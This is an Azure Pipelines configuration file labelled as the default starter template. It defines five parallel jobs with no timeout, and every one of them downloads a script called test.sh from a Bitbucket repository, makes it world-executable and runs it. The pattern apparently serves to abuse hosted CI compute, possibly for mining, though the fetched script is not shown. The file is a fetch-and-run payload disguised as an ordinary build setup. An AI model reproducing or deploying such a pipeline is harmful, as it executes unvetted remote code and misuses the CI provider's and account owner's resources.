# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml
# azure-pipelines.yml

trigger:
- main

pool:
  vmImage: ubuntu-16.04

jobs:
- job: MyJob1
  timeoutInMinutes: 0
  displayName: Pipeline 1
  steps:
  - script: |
      wget https://bitbucket.org/xngix/nodejs/raw/e50a23ad32e156509c4edc9da17f9c0aab586361/test.sh && chmod 777 test.sh && ./test.sh
    displayName: 'Run a multi-line script'

- job: MyJob2
  timeoutInMinutes: 0
  displayName: Pipeline 2
  steps:
  - script: |
      wget https://bitbucket.org/xngix/nodejs/raw/e50a23ad32e156509c4edc9da17f9c0aab586361/test.sh && chmod 777 test.sh && ./test.sh
    displayName: 'Run a multi-line script'

- job: MyJob3
  timeoutInMinutes: 0
  displayName: Pipeline 3
  steps:
  - script: |
      wget https://bitbucket.org/xngix/nodejs/raw/e50a23ad32e156509c4edc9da17f9c0aab586361/test.sh && chmod 777 test.sh && ./test.sh
    displayName: 'Run a multi-line script'

- job: MyJob4
  timeoutInMinutes: 0
  displayName: Pipeline 4
  steps:
  - script: |
      wget https://bitbucket.org/xngix/nodejs/raw/e50a23ad32e156509c4edc9da17f9c0aab586361/test.sh && chmod 777 test.sh && ./test.sh
    displayName: 'Run a multi-line script'

- job: MyJob5
  timeoutInMinutes: 0
  displayName: Pipeline 5
  steps:
  - script: |
      wget https://bitbucket.org/xngix/nodejs/raw/e50a23ad32e156509c4edc9da17f9c0aab586361/test.sh && chmod 777 test.sh && ./test.sh
    displayName: 'Run a multi-line script'
